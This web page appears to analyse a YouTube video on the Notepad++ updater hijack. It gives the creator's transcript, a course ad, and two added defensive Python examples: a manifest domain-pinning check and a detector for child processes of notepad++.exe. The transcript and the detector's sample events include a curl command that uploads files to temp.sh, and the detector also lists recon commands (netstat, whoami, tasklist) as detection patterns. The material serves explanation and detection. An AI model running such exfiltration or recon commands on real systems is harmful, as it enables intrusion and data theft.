Analysis Summary
Performed authenticity
The deliberate construction of "realness" — confessional tone, casual filming, strategic vulnerability — designed to lower your guard. When someone appears unpolished and honest, you evaluate their claims less critically. The spontaneity is rehearsed.
Goffman's dramaturgy (1959); Audrezet et al. (2020) on performed authenticity
Worth Noting
Positive elements
- This video provides a clear, accessible breakdown of complex cybersecurity concepts like DLL sideloading, TLS interception, and manifest hijacking.
Be Aware
Cautionary elements
- The use of 'nation-state' threat actors as a marketing hook to sell foundational programming courses.
Knowing about these techniques makes them visible, not powerless. The ones that work best on you are the ones that match beliefs you already hold.
This analysis is a tool for your own thinking — what you do with it is up to you.
Transcript
I know what you were thinking, okay? You were really hoping that they were going to install Copilot into Notepad. And then you were really hoping that when you went to go use Copilot in Notepad, you had to log into Notepad with your Microsoft account. I know, listen, Microsoft's got you covered. It's okay. But if you're not into those features, which, like, I don't know why you wouldn't be, but if you're not into those features, you can always use the go-to replacement, Notepad++, except for the fact that Notepad++ has been hacked, sort of. There's a lot of, I think, fear-mongering, maybe some fear stuff going on with Notepad++. It has been hacked in a certain way, but not normally, not the way we normally see hacks. Okay, so Notepad++ users, take note. It's time to check to see if you're hacked. Suspected China state hackers use update infrastructure to deliver a backdoored version. So, very interesting thing we have going on here. We see a threat actor using a vulnerability in the way that Notepad++ does updating to target a very small, specific group of individuals and not do some kind of, like, mass exploitation of Notepad++. Now, I want to kind of highlight what's neat about this: Kevin Beaumont, if I mispronounced your name, Kevin, I'm very sorry, but he actually wrote up this report in December of last year, where he collects evidence going back to November of last year, where he says: "I've heard from three orgs now who've had security incidents on boxes with Notepad++ installed where it appears Notepad++ processes have spawned the initial access. These have resulted in hands-on-keyboard threat actors." Meaning it's not a threat actor where, like, you have some kind of info stealer or, like, a crypto miner where it's all automated so that the actor doesn't have to do anything. It is such a high-detail operation on the part of the threat actor. They have somebody manually running the operation, like, with their hands on keyboard. Right?
This means this is very targeted, very specific access that this person, this group, is getting, which is really interesting. And again, it's interesting, this goes back to December 2nd. So what he notices in this is that there's actually a bug fix in version 8.8.8 of Notepad++ where literally the commit message is "security enhancement: prevent Notepad++ updater from being hijacked", which is not great. Now, as he highlights here, and I want to make sure we're also highlighting this here, the point of this article is not to flame the very good developer of Notepad++. The way this was exploited technically, like, if what we're seeing is true, is some severe, like, nation-state-level tampering, potentially with encrypted traffic, which is pretty interesting. So the way that this all works, he goes into in great detail in his article. Please go read his article. I'm just kind of, like, riffing off the top of it. The Notepad++ update process uses this updater called GUP, or WinGUp. And the way that it works, when you want to update a process or you want to update a program, you have to reach out and get, like, a manifest file, right? Like some file that tells you: do you have the right version of the software? What version are we serving? Oh, and then where do you go and get that version, right? And so in the GUP manifest here, you see kind of this XML file, and you'll see that we say, you know, it does need to be updated. We are serving version 8.8.8 at the time, and it shows you the place where you go and get it. You go get the update for Notepad++ at github.com/notepad++ and then the long release on github.com that gets you the .exe. This is downloaded and saved in temp. Now, you may be wondering, wait a minute, if this is done over HTTPS, if this is done encrypted, like, how are they able to just arbitrarily download malware onto my machine? Well, there are kind of two primary issues. First of all, originally, the traffic may have just been done over HTTP, right?
And because HTTP is not only clear-text traffic, but also there's no authentication with just raw HTTP; it doesn't have the authentication that the TLS layer gives you. You know, if you can intercept HTTP traffic, you could potentially either redirect the source of this file or even just modify the contents of this file to point the location to another location, right? Download a different installer. You may be asking, wait a minute, hold on. So I get a different .exe, but that .exe wasn't compiled and signed by the original creators of Notepad++. So why does that even matter? The downloads themselves are signed, but some earlier versions of Notepad++ use a self-signed root cert, which is on GitHub with 8.8.7, the prior release. This was reverted to GlobalSign, GlobalSign being a much bigger, trusted root certificate authority, and effectively there was a situation where, for some versions, the download is not robustly checked for tampering. What is very interesting, though, is that after a while they observed, I think, some compromises of this happening over HTTPS, which means that there is, somewhere in the chain between people that are downloading Notepad++ and Notepad++, an ISP associated with a nation state that has the ability to probably use a compromised certificate authority to intercept TLS traffic, right? Which is terrifying to think about, but not impossible given the way the technology works, right? So in theory, you know, the Chinese nation state supposedly sees the person they're trying to target going after this install. Okay, cool. So they know they have to go and change the manifest location by a TLS intercept, and they have that person now go download the backdoored version of Notepad++, which is really crazy. Before we keep going, today's video is sponsored by me.
Guys, I honestly believe that if you are a programmer in literally any language, be it Go, Python, or JavaScript, it will make you a better programmer if you understand the fundamentals at the low level. That's me, by the way. And so I made the Low Level Academy just to teach you those things. My courses are designed to teach you the fundamentals of how computers work at a very low level, at a simple level, so that you can get better at programming in general. Right now, you can go and sign up for my free course here in the hero section to get a free 3-day course to take, you know, a little sample of what you might get. Or you can go into the preview of the Zero to Hero C Programmer course and see what we got on the inside. You get the first lesson and the pointers lesson absolutely free. And if you make an account right now, you can go ahead and use our in-browser code editor. Guys, to be a good programmer, you got to know the fundamentals, and where do you learn the fundamentals? On Low Level Academy. Okay, back to the video. Based off of Kevin's analysis, what he's saying is that in the update for the actual security patch, not only did he change, I think, some of the, you know, probably plain-text encryption on HTTP and some other stuff, he also said "forced download domain", right? Meaning that you can only get Notepad++ from this URL, which means likely that, like, the front end of this GUP manifest was being replaced with, like, some malicious URL that pulled down the malware, right? Which is pretty interesting. And then so what would happen is you would then see from your Notepad++ instance, there were people reporting, "Hey, just out of curiosity, there is a curl binary," curl being the binary that, you know, you can use to arbitrarily make web requests over HTTP and otherwise. "Yeah, so I saw, as a child process of notepad++, curl is uploading files to temp.sh/upload."
"Does anyone else know what's going on here?" Oh, I'm also seeing the commands netstat -ano, systeminfo, tasklist, and whoami, which are, like, very traditional, like, initial recon on a box, right? netstat -ano gets you what ports are listening. tasklist, obviously, is what processes are running on the box, and then whoami is getting you what privilege level you have on Windows. So, yeah, those are like "hackers are in" type commands. And again, it's crazy that this is all spawning from the notepad++.exe process. Now, you know, it is possible that potentially, maybe, someone did DLL sideloading into Notepad++ at this time, but after enough analysis went through, people were seeing, like, oh no, literally, like, Notepad++ was getting autoupdater.exe, which was spawning all this malicious stuff, which is just bonkers. And then Rapid7, right, the security company behind software like Metasploit, for example, they did the analysis of kind of the entire chain of, you know, you get code execution through this, and then what are they putting on the computers and what are they doing with it? The chain looks kind of like this. It's interesting. So they see this NSIS .nsi script, which apparently is, like, very common for this specific China APT. They load BluetoothService.exe, that name likely just to, like, kind of blend in with the other processes on the computer, which is actually just a legitimate Bitdefender submission wizard, which is used for DLL sideloading. DLL sideloading is this technique that you use where, if you have a process that looks for, you know, apple.dll, right? Like, literally just the word apple, and apple.dll comes legitimately with the process. If you want to have it load your DLL that does malicious stuff and kind of have it blend in with the process, you can just name your DLL apple.dll and put it in a folder that has a higher precedence in the load order, and then it'll get loaded into the service. Right?
So they use that to maliciously sideload log.dll, a very simple word, that gets loaded by BluetoothService. And then log.dll does a lot of the malicious stuff, and it has the ability to load, decrypt and execute shellcode, which comes in the form of this BluetoothService file, which is just an encrypted shellcode blob, right? And they do a bunch of de-XORing and decryption, right? It's all XOR, everything. Every APT, you know, nation-state actors using XOR encryption out here to get the shellcode out and doing the evil stuff. And then from there it just seems like traditional CNO stuff, where they're doing cyber network operations to hack in and steal your data and watch you do evil. Oh yeah, and here are the opcodes, right? You're able to spawn an interactive shell, you know, C2 check-in, create a process, right? Follow the disc, blah blah blah blah blah, all that good stuff. And I may be curious, why would, why is China so interested in Notepad++? Hm. There's no reason that the nation of China would have anything to do with Notepad++, nor would Russia. Russia probably also would have nothing to do with that. And then later on, the self-signed certificate thing kind of maybe bit him in the ass a little bit. I literally just saw this tweet by Smelly, vx-underground: "Notepad++ says infra compromised, suspects Chinese state-sponsored hackers. Why would China hate Notepad++? Looks inside." And it's literally what I just said. That's so funny, dude. Anyway, guys, that's it for now. This hack, I want to highlight, is a lot more fun than the normal ones, right? Cuz normally it's just like, shitware software has vulnerability, gets exploited. People download horse porn on everyone's computers and mine Monero, right? That's, like, been every intrusion, it feels like, for the last, like, 3 years.
This is, for the first time in a while, an intrusion where it's like, oh, like, it is highly targeted, using a very, very specific technique that is very resource intensive, potentially leading to a TLS intercept, to run code on their system and do, like, real CNO hacker stuff, right? It's really, really interesting. But yeah, guys, that's it for now. Thanks for watching. I appreciate it. If you like this video, hit the sub button over here and then go check out this other video that I think you'll enjoy just as much. We'll see you in the next one. Take care.
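As an added example (not the video's material, and not Notepad++'s or WinGUp's actual code), here is the kind of "forced download domain" check the transcript describes, applied to a GUP-style manifest before anything is downloaded. The XML element names, the GitHub release-path prefix and both manifests are constructed assumptions; only the github.com host and the move from HTTP to HTTPS come from the transcript.

```python
"""Added example: a 'forced download domain' check for a GUP-style update manifest.
Not the real WinGUp code; element names, paths and both manifests are constructed."""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# The only origin and path prefix an installer may be fetched from (prefix is assumed).
ALLOWED_HOST = "github.com"
ALLOWED_PATH_PREFIX = "/notepad-plus-plus/notepad-plus-plus/releases/download/"

# Constructed manifests: one pointing at the expected release, one rewritten in transit
GOOD_MANIFEST = """<?xml version="1.0"?>
<GUP>
  <NeedToBeUpdated>yes</NeedToBeUpdated>
  <Version>8.8.8</Version>
  <Location>https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.8.8/npp.8.8.8.Installer.x64.exe</Location>
</GUP>"""
TAMPERED_MANIFEST = GOOD_MANIFEST.replace(
    "https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.8.8/",
    "http://updates.example.invalid/npp/")  # attacker-controlled mirror (constructed)


def parse_manifest(xml_text: str) -> dict:
    """Pull the three fields the updater acts on out of the manifest."""
    root = ET.fromstring(xml_text)
    return {
        "update": root.findtext("NeedToBeUpdated", "").strip().lower() == "yes",
        "version": root.findtext("Version", "").strip(),
        "location": root.findtext("Location", "").strip(),
    }


def hardened_location_check(location: str) -> bool:
    """Accept only https to the pinned host and release path prefix, with no userinfo.
    The pre-fix behaviour the video describes was to trust whatever URL the manifest named."""
    u = urlparse(location)
    return (u.scheme == "https"
            and u.hostname == ALLOWED_HOST           # exact host, so github.com.evil.tld fails
            and u.port in (None, 443)
            and u.username is None                   # no user@host confusion
            and u.path.startswith(ALLOWED_PATH_PREFIX))


def decide(xml_text: str) -> str:
    """'install', 'up-to-date' or 'reject' for a manifest under the hardened rule."""
    m = parse_manifest(xml_text)
    if not m["update"]:
        return "up-to-date"
    return "install" if hardened_location_check(m["location"]) else "reject"


if __name__ == "__main__":
    for name, text in (("good", GOOD_MANIFEST), ("tampered", TAMPERED_MANIFEST)):
        print(name, decide(text))   # good install / tampered reject
```

Pinning the origin only narrows where a rewritten manifest can send the client; the downloaded installer's code signature against a publicly trusted CA, as the transcript notes for the GlobalSign revert, still has to be verified before it runs.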
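Also added here (not from the video or from Rapid7's analysis): detection logic for the behaviour the reporters describe, recon commands and a curl upload to temp.sh appearing as children of notepad++.exe, run over constructed process-creation records. The record field names, the sample events and the gup.exe allowlist entry are assumptions.

```python
"""Added example: flag the child-process behaviour the video describes under notepad++.exe.
Not the video's or Rapid7's code; the event fields and the sample events are constructed."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ProcEvent:
    """Minimal process-creation record (field names assumed, Sysmon-like)."""
    parent_image: str
    image: str
    command_line: str


# Recon commands the reporters saw right after the updater spawned things
RECON_TOOLS = {"netstat.exe", "systeminfo.exe", "tasklist.exe", "whoami.exe"}
# curl pushing files to a drop site is the exfil that was reported
UPLOAD_MARKERS = ("temp.sh/upload", " -F ", "--upload-file", " -T ")
# Children a healthy Notepad++ install does spawn (gup.exe is the updater; name assumed)
EXPECTED_CHILDREN = {"gup.exe"}


def basename(path: str) -> str:
    """Case-folded file name regardless of slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a finding label for one event, or None if it is not of interest."""
    if basename(ev.parent_image) != "notepad++.exe":
        return None                       # only children of the editor matter here
    child = basename(ev.image)
    if child in RECON_TOOLS:
        return f"recon:{child}"
    if child == "curl.exe" and any(m in ev.command_line for m in UPLOAD_MARKERS):
        return f"upload:{child}"
    if child not in EXPECTED_CHILDREN:
        return f"unexpected-child:{child}"  # e.g. a dropped autoupdater.exe
    return None


def detect(events: List[ProcEvent]) -> List[str]:
    return [f for f in (classify(e) for e in events) if f]


NPP = r"C:\Program Files\Notepad++\notepad++.exe"
SAMPLE = [  # constructed events modelled on the transcript
    ProcEvent(NPP, r"C:\Program Files\Notepad++\updater\GUP.exe", "GUP.exe"),
    ProcEvent(NPP, r"C:\Windows\System32\netstat.exe", "netstat -ano"),
    ProcEvent(NPP, r"C:\Windows\System32\whoami.exe", "whoami"),
    ProcEvent(NPP, r"C:\Windows\System32\curl.exe", "curl -F file=@out.zip https://temp.sh/upload"),
    ProcEvent(NPP, r"C:\Users\Public\autoupdater.exe", "autoupdater.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\whoami.exe", "whoami"),
]
```

Any child of the editor that is not the updater is reported, so a renamed dropper still surfaces even when it uses none of the listed commands.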
Video description
🏫 MY COURSES: Sign up for my FREE 3-Day C Course: https://lowlevel.academy
🧙♂️ HACK YOUR CAREER: Wanna learn to hack? Join my new CTF platform: https://stacksmash.io
🔥 COME HANG OUT: Check out my other stuff: https://lowlevel.tv